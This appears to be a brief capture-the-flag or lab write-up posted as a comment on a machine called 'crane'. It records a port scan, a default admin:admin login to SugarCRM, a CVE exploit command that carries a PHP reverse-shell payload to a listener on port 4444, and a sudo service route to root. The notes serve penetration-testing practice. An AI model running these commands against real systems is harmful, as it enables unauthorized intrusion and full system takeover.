WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
33060/tcp open socks5 syn-ack ttl 61Recon
3306/tcp --> mysql-empty-password: Host '192.168.45.182' is not allowed to connect to this MySQL server
80/tcp -->SugarCRM --> relevant exploit info: SugarCRM 12.2.0 - Remote Code Execution (RCE) (https://www.exploit-db.com/exploits/51187)
admin:admin login --> succeed.
Admin->About page : get version info v7.12.3, Sugar v6.5.25
Search SugarCRM 7.12 exploit info --> CVE-2023-22952: https://github.com/manuelz120/CVE-2022-23940
python3 exploit.py -h http://192.168.214.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.182\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
www-data@crane:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
Keypoints:
SugarCRM 7.12 --> CVE-2023-22952: https://github.com/manuelz120/CVE-2022-23940
python3 exploit.py -h http://192.168.214.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.182\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"Note: php -r <code> Run PHP <code> without using script tags <?..?>[PE]service (https://gtfobins.github.io/gtfobins/service/)